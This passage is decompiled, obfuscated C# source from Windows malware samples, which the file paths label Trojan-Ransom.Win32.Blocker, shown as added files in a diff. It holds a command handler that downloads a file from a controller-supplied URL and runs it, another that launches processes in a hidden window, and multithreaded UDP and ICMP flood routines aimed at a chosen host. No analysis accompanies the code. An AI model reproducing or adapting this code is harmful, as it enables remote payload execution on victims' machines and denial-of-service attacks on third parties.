c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1571),
1
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1590),
2
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1607),
3
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1626),
4
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1643),
5
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1654),
6
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1667),
7
}
};
}
int num;
// ISSUE: reference to a compiler-generated field
// ISSUE: explicit non-virtual call
if (!__nonvirtual (c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc.TryGetValue(key, out num)))
return;
switch (num)
{
case 0:
try
{
c2b32128b27710d76674c1117f7f19ccf.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
c2b32128b27710d76674c1117f7f19ccf.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
c2b32128b27710d76674c1117f7f19ccf.c52cb3c9fa9ea96db544af1bec7b932c8 = Convert.ToInt32(strArray[4]);
c2b32128b27710d76674c1117f7f19ccf.c68372a86611194582de7bf4f45c72f47();
break;
}
catch
{
break;
}
case 1:
try
{
c986963ced362383f6d7b6341e31dcfe7.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[2]);
c986963ced362383f6d7b6341e31dcfe7.cef8e53905308fbf449ffc06b3aecf429();
break;
}
catch
{
break;
}
case 2:
try
{
ca2a3d5a1b8d431c404c11a5f27d5064a.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
ca2a3d5a1b8d431c404c11a5f27d5064a.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
ca2a3d5a1b8d431c404c11a5f27d5064a.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
ca2a3d5a1b8d431c404c11a5f27d5064a.ce1f122b7ea8865781912d724c92b0e28 = Convert.ToInt32(strArray[4]);
ca2a3d5a1b8d431c404c11a5f27d5064a.cced20ebbb17c5b4c22dbd925be9f7bd0 = Convert.ToInt32(strArray[5]);
ca2a3d5a1b8d431c404c11a5f27d5064a.c1e47aee5510fe6af6ef6c306b4a8c34a();
break;
}
catch
{
break;
}
case 3:
try
{
cb7379333abfa1ab1cb35304f3a8573ec.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
cb7379333abfa1ab1cb35304f3a8573ec.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
cb7379333abfa1ab1cb35304f3a8573ec.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
cb7379333abfa1ab1cb35304f3a8573ec.cf0383b25e10d922cf775f947a9893ddb = Convert.ToInt32(strArray[4]);
cb7379333abfa1ab1cb35304f3a8573ec.cced20ebbb17c5b4c22dbd925be9f7bd0 = Convert.ToInt32(strArray[5]);
cb7379333abfa1ab1cb35304f3a8573ec.cd351d92ca1a938962136bd5808af7e90();
break;
}
catch
{
break;
}
case 4:
try
{
string str = c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c4028bc68211f16a03921654b4b8b346f(new Random().Next(5, 12)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1680);
new WebClient().DownloadFile(Convert.ToString(strArray[1]), Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str);
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str)
}
}.Start();
break;
}
catch
{
break;
}
case 5:
try
{
Process process = new Process()
{
StartInfo = new ProcessStartInfo(Convert.ToString(strArray[1]))
};
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
break;
}
catch
{
break;
}
case 6:
c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.c32ad199a1a1b21b2f3794ba8b7927c6b(Convert.ToString(strArray[1]));
break;
case 7:
if (!(strArray[1] == Environment.MachineName) && !(strArray[1].ToUpper() == c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1698)))
break;
c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.ceaf8f38b42d6fe6312cc350ddb4ba0d6();
break;
}
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/ca2a3d5a1b8d431c404c11a5f27d5064a.cs
+122
View File
@@ -0,0 +1,122 @@
// Decompiled with JetBrains decompiler
// Type: A.ca2a3d5a1b8d431c404c11a5f27d5064a
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System.Net;
using System.Net.Sockets;
using System.Threading;
namespace A
{
internal class ca2a3d5a1b8d431c404c11a5f27d5064a
{
private static ThreadStart[] c1aa5e7f9240b5cc21ac78813ddfbaa39;
private static Thread[] c12e108ff6c83dbee08305cc2b0ce9998;
public static string c966ab90271ad8729ab4aa4181c310abf;
private static IPEndPoint cdd98f4a39e676344f91b06e9be54701b;
public static ushort cf7dbbb0d9526e45865da4ee3fb9e1488;
public static int cced20ebbb17c5b4c22dbd925be9f7bd0;
private static ca2a3d5a1b8d431c404c11a5f27d5064a.ca94bf5d3d0eb8f635b7ee4989482d69d[] cc56b909ba2467b64852301c0ddafe66b;
public static int c1e5fb6eadf8fa36fbb78b515080241e1;
public static int ce1f122b7ea8865781912d724c92b0e28;
public static void c1e47aee5510fe6af6ef6c306b4a8c34a()
{
try
{
ca2a3d5a1b8d431c404c11a5f27d5064a.cdd98f4a39e676344f91b06e9be54701b = new IPEndPoint(Dns.GetHostEntry(ca2a3d5a1b8d431c404c11a5f27d5064a.c966ab90271ad8729ab4aa4181c310abf).AddressList[0], (int) ca2a3d5a1b8d431c404c11a5f27d5064a.cf7dbbb0d9526e45865da4ee3fb9e1488);
}
catch
{
ca2a3d5a1b8d431c404c11a5f27d5064a.cdd98f4a39e676344f91b06e9be54701b = new IPEndPoint(IPAddress.Parse(ca2a3d5a1b8d431c404c11a5f27d5064a.c966ab90271ad8729ab4aa4181c310abf), (int) ca2a3d5a1b8d431c404c11a5f27d5064a.cf7dbbb0d9526e45865da4ee3fb9e1488);
}
ca2a3d5a1b8d431c404c11a5f27d5064a.c12e108ff6c83dbee08305cc2b0ce9998 = new Thread[ca2a3d5a1b8d431c404c11a5f27d5064a.c1e5fb6eadf8fa36fbb78b515080241e1];
ca2a3d5a1b8d431c404c11a5f27d5064a.c1aa5e7f9240b5cc21ac78813ddfbaa39 = new ThreadStart[ca2a3d5a1b8d431c404c11a5f27d5064a.c1e5fb6eadf8fa36fbb78b515080241e1];
ca2a3d5a1b8d431c404c11a5f27d5064a.cc56b909ba2467b64852301c0ddafe66b = new ca2a3d5a1b8d431c404c11a5f27d5064a.ca94bf5d3d0eb8f635b7ee4989482d69d[ca2a3d5a1b8d431c404c11a5f27d5064a.c1e5fb6eadf8fa36fbb78b515080241e1];
for (int index = 0; index < ca2a3d5a1b8d431c404c11a5f27d5064a.c1e5fb6eadf8fa36fbb78b515080241e1; ++index)
{
ca2a3d5a1b8d431c404c11a5f27d5064a.cc56b909ba2467b64852301c0ddafe66b[index] = new ca2a3d5a1b8d431c404c11a5f27d5064a.ca94bf5d3d0eb8f635b7ee4989482d69d(ca2a3d5a1b8d431c404c11a5f27d5064a.cdd98f4a39e676344f91b06e9be54701b, ca2a3d5a1b8d431c404c11a5f27d5064a.ce1f122b7ea8865781912d724c92b0e28, ca2a3d5a1b8d431c404c11a5f27d5064a.cced20ebbb17c5b4c22dbd925be9f7bd0);
ca2a3d5a1b8d431c404c11a5f27d5064a.c1aa5e7f9240b5cc21ac78813ddfbaa39[index] = new ThreadStart(ca2a3d5a1b8d431c404c11a5f27d5064a.cc56b909ba2467b64852301c0ddafe66b[index].c254d67f0f5a5ab80dbe5de1d1b27a54e);
ca2a3d5a1b8d431c404c11a5f27d5064a.c12e108ff6c83dbee08305cc2b0ce9998[index] = new Thread(ca2a3d5a1b8d431c404c11a5f27d5064a.c1aa5e7f9240b5cc21ac78813ddfbaa39[index]);
ca2a3d5a1b8d431c404c11a5f27d5064a.c12e108ff6c83dbee08305cc2b0ce9998[index].Start();
}
}
public static void c4f970d2f71876e66d1daba6a51237e62()
{
for (int index = 0; index < ca2a3d5a1b8d431c404c11a5f27d5064a.c1e5fb6eadf8fa36fbb78b515080241e1; ++index)
{
try
{
ca2a3d5a1b8d431c404c11a5f27d5064a.c12e108ff6c83dbee08305cc2b0ce9998[index].Suspend();
}
catch
{
}
}
}
private class ca94bf5d3d0eb8f635b7ee4989482d69d
{
private IPEndPoint cdd98f4a39e676344f91b06e9be54701b;
private int cced20ebbb17c5b4c22dbd925be9f7bd0;
private Socket[] cd5ac2690507af44059caeb0c8b2a71f7;
private int ce1f122b7ea8865781912d724c92b0e28;
public ca94bf5d3d0eb8f635b7ee4989482d69d(
IPEndPoint c8293ed1972789902aa5c44e762d830c9,
int cb43681044880256f22aeddc96516b172,
int cee8c5650a27830fc592eaa0c83f141af)
{
this.cdd98f4a39e676344f91b06e9be54701b = c8293ed1972789902aa5c44e762d830c9;
this.ce1f122b7ea8865781912d724c92b0e28 = cb43681044880256f22aeddc96516b172;
this.cced20ebbb17c5b4c22dbd925be9f7bd0 = cee8c5650a27830fc592eaa0c83f141af;
}
public void c254d67f0f5a5ab80dbe5de1d1b27a54e()
{
while (true)
{
byte[] buffer = new byte[this.cced20ebbb17c5b4c22dbd925be9f7bd0];
try
{
this.cd5ac2690507af44059caeb0c8b2a71f7 = new Socket[this.ce1f122b7ea8865781912d724c92b0e28];
for (int index = 0; index < this.ce1f122b7ea8865781912d724c92b0e28; ++index)
{
this.cd5ac2690507af44059caeb0c8b2a71f7[index] = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Blocking = false;
this.cd5ac2690507af44059caeb0c8b2a71f7[index].SendTo(buffer, (EndPoint) this.cdd98f4a39e676344f91b06e9be54701b);
}
Thread.Sleep(100);
for (int index = 0; index < this.ce1f122b7ea8865781912d724c92b0e28; ++index)
{
if (this.cd5ac2690507af44059caeb0c8b2a71f7[index].Connected)
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Disconnect(false);
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Close();
this.cd5ac2690507af44059caeb0c8b2a71f7[index] = (Socket) null;
}
this.cd5ac2690507af44059caeb0c8b2a71f7 = (Socket[]) null;
}
catch
{
for (int index = 0; index < this.ce1f122b7ea8865781912d724c92b0e28; ++index)
{
try
{
if (this.cd5ac2690507af44059caeb0c8b2a71f7[index].Connected)
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Disconnect(false);
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Close();
this.cd5ac2690507af44059caeb0c8b2a71f7[index] = (Socket) null;
}
catch
{
}
}
}
}
}
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/cb7379333abfa1ab1cb35304f3a8573ec.cs
+122
View File
@@ -0,0 +1,122 @@
// Decompiled with JetBrains decompiler
// Type: A.cb7379333abfa1ab1cb35304f3a8573ec
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System.Net;
using System.Net.Sockets;
using System.Threading;
namespace A
{
internal class cb7379333abfa1ab1cb35304f3a8573ec
{
private static ThreadStart[] c1aa5e7f9240b5cc21ac78813ddfbaa39;
private static Thread[] c12e108ff6c83dbee08305cc2b0ce9998;
public static string c966ab90271ad8729ab4aa4181c310abf;
public static int cf0383b25e10d922cf775f947a9893ddb;
private static IPEndPoint cdd98f4a39e676344f91b06e9be54701b;
public static ushort cf7dbbb0d9526e45865da4ee3fb9e1488;
public static int cced20ebbb17c5b4c22dbd925be9f7bd0;
private static cb7379333abfa1ab1cb35304f3a8573ec.c6b6e86a2c1585fa39b0d81cf604523e2[] cbf1882908126c4fd9d6742c1821f8e90;
public static int c1e5fb6eadf8fa36fbb78b515080241e1;
public static void cd351d92ca1a938962136bd5808af7e90()
{
try
{
cb7379333abfa1ab1cb35304f3a8573ec.cdd98f4a39e676344f91b06e9be54701b = new IPEndPoint(Dns.GetHostEntry(cb7379333abfa1ab1cb35304f3a8573ec.c966ab90271ad8729ab4aa4181c310abf).AddressList[0], (int) cb7379333abfa1ab1cb35304f3a8573ec.cf7dbbb0d9526e45865da4ee3fb9e1488);
}
catch
{
cb7379333abfa1ab1cb35304f3a8573ec.cdd98f4a39e676344f91b06e9be54701b = new IPEndPoint(IPAddress.Parse(cb7379333abfa1ab1cb35304f3a8573ec.c966ab90271ad8729ab4aa4181c310abf), (int) cb7379333abfa1ab1cb35304f3a8573ec.cf7dbbb0d9526e45865da4ee3fb9e1488);
}
cb7379333abfa1ab1cb35304f3a8573ec.c12e108ff6c83dbee08305cc2b0ce9998 = new Thread[cb7379333abfa1ab1cb35304f3a8573ec.c1e5fb6eadf8fa36fbb78b515080241e1];
cb7379333abfa1ab1cb35304f3a8573ec.c1aa5e7f9240b5cc21ac78813ddfbaa39 = new ThreadStart[cb7379333abfa1ab1cb35304f3a8573ec.c1e5fb6eadf8fa36fbb78b515080241e1];
cb7379333abfa1ab1cb35304f3a8573ec.cbf1882908126c4fd9d6742c1821f8e90 = new cb7379333abfa1ab1cb35304f3a8573ec.c6b6e86a2c1585fa39b0d81cf604523e2[cb7379333abfa1ab1cb35304f3a8573ec.c1e5fb6eadf8fa36fbb78b515080241e1];
for (int index = 0; index < cb7379333abfa1ab1cb35304f3a8573ec.c1e5fb6eadf8fa36fbb78b515080241e1; ++index)
{
cb7379333abfa1ab1cb35304f3a8573ec.cbf1882908126c4fd9d6742c1821f8e90[index] = new cb7379333abfa1ab1cb35304f3a8573ec.c6b6e86a2c1585fa39b0d81cf604523e2(cb7379333abfa1ab1cb35304f3a8573ec.cdd98f4a39e676344f91b06e9be54701b, cb7379333abfa1ab1cb35304f3a8573ec.cf0383b25e10d922cf775f947a9893ddb, cb7379333abfa1ab1cb35304f3a8573ec.cced20ebbb17c5b4c22dbd925be9f7bd0);
cb7379333abfa1ab1cb35304f3a8573ec.c1aa5e7f9240b5cc21ac78813ddfbaa39[index] = new ThreadStart(cb7379333abfa1ab1cb35304f3a8573ec.cbf1882908126c4fd9d6742c1821f8e90[index].c254d67f0f5a5ab80dbe5de1d1b27a54e);
cb7379333abfa1ab1cb35304f3a8573ec.c12e108ff6c83dbee08305cc2b0ce9998[index] = new Thread(cb7379333abfa1ab1cb35304f3a8573ec.c1aa5e7f9240b5cc21ac78813ddfbaa39[index]);
cb7379333abfa1ab1cb35304f3a8573ec.c12e108ff6c83dbee08305cc2b0ce9998[index].Start();
}
}
public static void cc3c1bbd84093cbd7bdc83bcc5fb3ac15()
{
for (int index = 0; index < cb7379333abfa1ab1cb35304f3a8573ec.c1e5fb6eadf8fa36fbb78b515080241e1; ++index)
{
try
{
cb7379333abfa1ab1cb35304f3a8573ec.c12e108ff6c83dbee08305cc2b0ce9998[index].Suspend();
}
catch
{
}
}
}
private class c6b6e86a2c1585fa39b0d81cf604523e2
{
private int cf0383b25e10d922cf775f947a9893ddb;
private IPEndPoint cdd98f4a39e676344f91b06e9be54701b;
private int cced20ebbb17c5b4c22dbd925be9f7bd0;
private Socket[] cd5ac2690507af44059caeb0c8b2a71f7;
public c6b6e86a2c1585fa39b0d81cf604523e2(
IPEndPoint cdd98f4a39e676344f91b06e9be54701b,
int cd02c4fcc6a568f6e41c3e84b34277e87,
int cced20ebbb17c5b4c22dbd925be9f7bd0)
{
this.cdd98f4a39e676344f91b06e9be54701b = cdd98f4a39e676344f91b06e9be54701b;
this.cf0383b25e10d922cf775f947a9893ddb = cd02c4fcc6a568f6e41c3e84b34277e87;
this.cced20ebbb17c5b4c22dbd925be9f7bd0 = cced20ebbb17c5b4c22dbd925be9f7bd0;
}
public void c254d67f0f5a5ab80dbe5de1d1b27a54e()
{
while (true)
{
byte[] buffer = new byte[this.cced20ebbb17c5b4c22dbd925be9f7bd0];
try
{
this.cd5ac2690507af44059caeb0c8b2a71f7 = new Socket[this.cf0383b25e10d922cf775f947a9893ddb];
for (int index = 0; index < this.cf0383b25e10d922cf775f947a9893ddb; ++index)
{
this.cd5ac2690507af44059caeb0c8b2a71f7[index] = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Icmp);
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Blocking = false;
this.cd5ac2690507af44059caeb0c8b2a71f7[index].SendTo(buffer, (EndPoint) this.cdd98f4a39e676344f91b06e9be54701b);
}
Thread.Sleep(100);
for (int index = 0; index < this.cf0383b25e10d922cf775f947a9893ddb; ++index)
{
if (this.cd5ac2690507af44059caeb0c8b2a71f7[index].Connected)
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Disconnect(false);
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Close();
this.cd5ac2690507af44059caeb0c8b2a71f7[index] = (Socket) null;
}
this.cd5ac2690507af44059caeb0c8b2a71f7 = (Socket[]) null;
}
catch
{
for (int index = 0; index < this.cf0383b25e10d922cf775f947a9893ddb; ++index)
{
try
{
if (this.cd5ac2690507af44059caeb0c8b2a71f7[index].Connected)
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Disconnect(false);
this.cd5ac2690507af44059caeb0c8b2a71f7[index].Close();
this.cd5ac2690507af44059caeb0c8b2a71f7[index] = (Socket) null;
}
catch
{
}
}
}
}
}
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/cb7b65dbb5581eaee2bd1292ca8df7359.cs
+48
View File
@@ -0,0 +1,48 @@
// Decompiled with JetBrains decompiler
// Type: A.cb7b65dbb5581eaee2bd1292ca8df7359
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Reflection;
namespace A
{
internal class cb7b65dbb5581eaee2bd1292ca8df7359
{
private static readonly Assembly cf3729dbae694133f2c23fdc1ca4d7914;
static cb7b65dbb5581eaee2bd1292ca8df7359()
{
if ((object) cb7b65dbb5581eaee2bd1292ca8df7359.cf3729dbae694133f2c23fdc1ca4d7914 != null)
return;
Assembly executingAssembly = Assembly.GetExecutingAssembly();
string name = executingAssembly.GetName().Name;
foreach (string manifestResourceName in executingAssembly.GetManifestResourceNames())
{
if (name == manifestResourceName)
{
cb7b65dbb5581eaee2bd1292ca8df7359.cf3729dbae694133f2c23fdc1ca4d7914 = Assembly.Load(c723bfb08ed492f620d3f103aea9340c0.c62aa9377688ed67bcfc8a790818c7647(executingAssembly.GetManifestResourceStream(name)));
break;
}
}
}
internal static void ced5cd5d8a5c50a5a5aa8329c9369c6b7() => AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(cb7b65dbb5581eaee2bd1292ca8df7359.c0e352055baf8810250e1c622207b6459);
private static Assembly c0e352055baf8810250e1c622207b6459(
object c5669828436342a69e25de42ecd6cb771,
ResolveEventArgs c01306e5de7acf5afd10f9b0df1fe65dd)
{
if ((object) cb7b65dbb5581eaee2bd1292ca8df7359.cf3729dbae694133f2c23fdc1ca4d7914 == null)
return cb7b65dbb5581eaee2bd1292ca8df7359.cf3729dbae694133f2c23fdc1ca4d7914;
foreach (string manifestResourceName in cb7b65dbb5581eaee2bd1292ca8df7359.cf3729dbae694133f2c23fdc1ca4d7914.GetManifestResourceNames())
{
if (manifestResourceName == c01306e5de7acf5afd10f9b0df1fe65dd.Name)
return cb7b65dbb5581eaee2bd1292ca8df7359.cf3729dbae694133f2c23fdc1ca4d7914;
}
return (Assembly) null;
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/cee7cc3756d4f6d8913411c92b2e1cc36.cs
+49
View File
@@ -0,0 +1,49 @@
// Decompiled with JetBrains decompiler
// Type: A.cee7cc3756d4f6d8913411c92b2e1cc36
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Cryptography;
using System.Text;
namespace A
{
internal class cee7cc3756d4f6d8913411c92b2e1cc36
{
public bool c8aea4603f5edff1781d66fc7c389635e(string cf11b7aa1c9e7d8e2089a37fab75f7bc2) => Process.GetProcessesByName(cf11b7aa1c9e7d8e2089a37fab75f7bc2).Length > 0;
private string c0b5e2bd54f7aaa36254ad6108123d704(string c32d06ec84131a62668e3e18e23c950ae)
{
FileStream inputStream = File.OpenRead(c32d06ec84131a62668e3e18e23c950ae);
byte[] hash = new MD5CryptoServiceProvider().ComputeHash((Stream) inputStream);
inputStream.Close();
return BitConverter.ToString(hash).Replace(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(390), "").ToUpper();
}
public string c31239248ceba059cc32e70ac96898ec2(string c45a1644c18560d9d988c8c135941ea96) => BitConverter.ToString(new MD5CryptoServiceProvider().ComputeHash(Encoding.Default.GetBytes(c45a1644c18560d9d988c8c135941ea96))).Replace(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(390), "").ToLower().ToUpper();
public string c4028bc68211f16a03921654b4b8b346f(int cc0d8efdc055b694066b5391dc96356b6)
{
Random random = new Random();
string str = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(393);
string empty = string.Empty;
for (int index = 0; index < cc0d8efdc055b694066b5391dc96356b6; ++index)
empty += str.Substring(random.Next(0, str.Length), 1);
return empty;
}
public bool c8f544c7c514248e2027acc2eed25b743(string c8ce60bab4df112e38d93bdc39407e331)
{
if (!File.Exists(c8ce60bab4df112e38d93bdc39407e331))
return false;
if (!(this.c0b5e2bd54f7aaa36254ad6108123d704(c8ce60bab4df112e38d93bdc39407e331) != this.c0b5e2bd54f7aaa36254ad6108123d704(Process.GetCurrentProcess().MainModule.FileName)))
return true;
File.Delete(c8ce60bab4df112e38d93bdc39407e331);
return false;
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/AssemblyInfo.cs
+18
View File
@@ -0,0 +1,18 @@
using SmartAssembly.Attributes;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("WinData")]
[assembly: AssemblyCopyright("Copyright © 2012")]
[assembly: AssemblyTitle("WinData")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: Guid("3b4a5c85-91c9-4b3b-88d3-14814dd76514")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: PoweredBy("Powered by SmartAssembly 6.6.1.31")]
[assembly: SuppressIldasm]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/SmartAssembly/AssemblyResolver/AssemblyResolver.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.AssemblyResolver.AssemblyResolver
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System;
namespace SmartAssembly.AssemblyResolver
{
public sealed class AssemblyResolver
{
public static void AttachApp()
{
try
{
AssemblyResolverHelper.Attach();
}
catch (Exception ex)
{
}
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/SmartAssembly/AssemblyResolver/AssemblyResolverHelper.cs
+206
View File
@@ -0,0 +1,206 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.AssemblyResolver.AssemblyResolverHelper
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using SmartAssembly.Zip;
using System;
using System.Collections;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace SmartAssembly.AssemblyResolver
{
internal sealed class AssemblyResolverHelper
{
internal const string BindList = "{71461f04-2faa-4bb9-a0dd-28a79101b599}";
private const int MOVEFILE_DELAY_UNTIL_REBOOT = 4;
private static Hashtable hashtable = new Hashtable();
[DllImport("kernel32")]
private static extern bool MoveFileEx(string existingFileName, string newFileName, int flags);
internal static bool IsWebApplication
{
get
{
try
{
string lower = Process.GetCurrentProcess().MainModule.ModuleName.ToLower();
if (lower == "w3wp.exe")
return true;
if (lower == "aspnet_wp.exe")
return true;
}
catch
{
}
return false;
}
}
internal static void Attach()
{
try
{
AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(AssemblyResolverHelper.ResolveAssembly);
}
catch
{
}
}
internal static Assembly ResolveAssembly(object sender, ResolveEventArgs e)
{
AssemblyResolverHelper.AssemblyInfo assemblyInfo = new AssemblyResolverHelper.AssemblyInfo(e.Name);
string base64String1 = Convert.ToBase64String(Encoding.UTF8.GetBytes(assemblyInfo.GetAssemblyFullName(false)));
string[] strArray = "ezJkYzBkMzY3LTQ2MDEtNGJjNS04Y2Q0LWFlM2E2MGY1NzYwMH0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{b9141284-224a-4b92-8f0a-8b542563c270},ezJkYzBkMzY3LTQ2MDEtNGJjNS04Y2Q0LWFlM2E2MGY1NzYwMH0=,[z]{b9141284-224a-4b92-8f0a-8b542563c270}".Split(',');
string str1 = string.Empty;
bool flag1 = false;
bool flag2 = false;
for (int index = 0; index < strArray.Length - 1; index += 2)
{
if (strArray[index] == base64String1)
{
str1 = strArray[index + 1];
break;
}
}
if (str1.Length == 0 && assemblyInfo.PublicKeyToken.Length == 0)
{
string base64String2 = Convert.ToBase64String(Encoding.UTF8.GetBytes(assemblyInfo.Name));
for (int index = 0; index < strArray.Length - 1; index += 2)
{
if (strArray[index] == base64String2)
{
str1 = strArray[index + 1];
break;
}
}
}
if (str1.Length > 0)
{
if (str1[0] == '[')
{
int num = str1.IndexOf(']');
string str2 = str1.Substring(1, num - 1);
flag1 = str2.IndexOf('z') >= 0;
flag2 = str2.IndexOf('t') >= 0;
str1 = str1.Substring(num + 1);
}
lock (AssemblyResolverHelper.hashtable)
{
if (AssemblyResolverHelper.hashtable.ContainsKey((object) str1))
return (Assembly) AssemblyResolverHelper.hashtable[(object) str1];
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str1);
if (manifestResourceStream != null)
{
int length = (int) manifestResourceStream.Length;
byte[] numArray = new byte[length];
manifestResourceStream.Read(numArray, 0, length);
if (flag1)
numArray = SimpleZip.Unzip(numArray);
